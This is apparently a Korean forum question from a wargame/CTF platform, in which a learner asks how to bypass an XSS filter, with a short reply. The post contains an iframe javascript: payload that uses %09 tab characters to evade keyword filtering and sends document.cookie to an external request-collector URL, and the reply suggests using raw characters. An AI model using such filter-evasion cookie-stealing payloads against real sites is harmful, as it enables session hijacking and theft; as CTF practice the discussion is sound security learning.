완료됨
우회방법과 cookie 질문드립니다...

iframe src="javascript" 구문에 %09 URL 인코딩을 섞어서 필터링을 우회하고자 하는데요,

iframe src="javascri%09pt:locatio%09n.href=%27~~~.dreamhack.games/?memo=%27+docu%09ment.gookie;">
구문을 전송하면 vuln 페이지에서는 memo= 빈칸이 requestbin에 전송되고

flag 페이지에선 아무것도 전송되지 않습니다...

<iframe srcdoc 로는 javascript:~~ 구문이 안먹는것같고,, 어떻게 우회해야될지 모르겟네요 ㅠㅠ

#web
작성자 정보
더 깊이 있는 답변이 필요할 때
드림핵 팀과 멘토에게 직접 문의해 보세요!
답변 1
탈퇴한 이용자
대표 업적 없음
탈퇴한 이용자
대표 업적 없음

인코딩 되기 전 raw 데이터로 바꿔서 넣어보세요
그리고 디테일한 부분만 조정하시면 충분히 플래그를 얻을 수 있어요

2022.06.30. 13:17